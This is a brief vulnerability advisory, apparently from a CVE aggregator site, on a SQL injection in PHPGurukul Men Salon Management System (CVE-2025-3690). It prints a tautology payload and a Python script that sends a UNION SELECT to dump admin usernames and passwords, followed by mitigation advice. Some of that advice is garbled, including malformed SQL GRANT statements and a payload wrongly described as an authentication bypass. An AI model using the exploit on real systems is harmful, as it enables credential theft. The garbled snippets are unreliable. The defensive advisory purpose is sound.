PHPGurukul Men Salon Management System 10, SQL Injection, CVE-2025-3690 (Critical)

Listen to this Post

How CVE-2025-3690 Works

The vulnerability exists in `/admin/edit-services.php` where user-supplied input in the `cost` parameter is directly concatenated into an SQL query without proper sanitization. Attackers can inject malicious SQL payloads through this parameter, manipulating database queries to extract sensitive information, modify data, or execute administrative operations. The flaw stems from missing input validation and insecure SQL query construction, allowing remote exploitation without authentication.

DailyCVE Form

Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/24/2025

What Undercode Say:

Exploitation:

1. Payload Example:

' OR 1=1-- -

Injected into the `cost` parameter to bypass authentication.

2. Exploit Code:

import requests
target = "http://target.com/admin/edit-services.php"
payload = {"cost": "' UNION SELECT 1,username,password,4 FROM admin-- -"}
response = requests.post(target, data=payload)
print(response.text)

Protection:

1. Input Sanitization:

$cost = mysqli_real_escape_string($conn, $_POST['cost']);

2. Prepared Statements:

$stmt = $conn->prepare("UPDATE services SET cost=? WHERE id=?");
$stmt->bind_param("di", $cost, $id);

3. WAF Rules:

location /admin/ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "deny,status:403"';
}

4. Logging Commands:

tail -f /var/log/apache2/access.log | grep 'edit-services.php'

5. Patch Verification:

grep -r "mysql_query" /var/www/html/admin/

6. Database Hardening:

REVOKE ALL PRIVILEGES ON . FROM 'app_user'@'%';
GRANT SELECT, UPDATE ON salon_db. TO 'app_user'@'localhost';

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top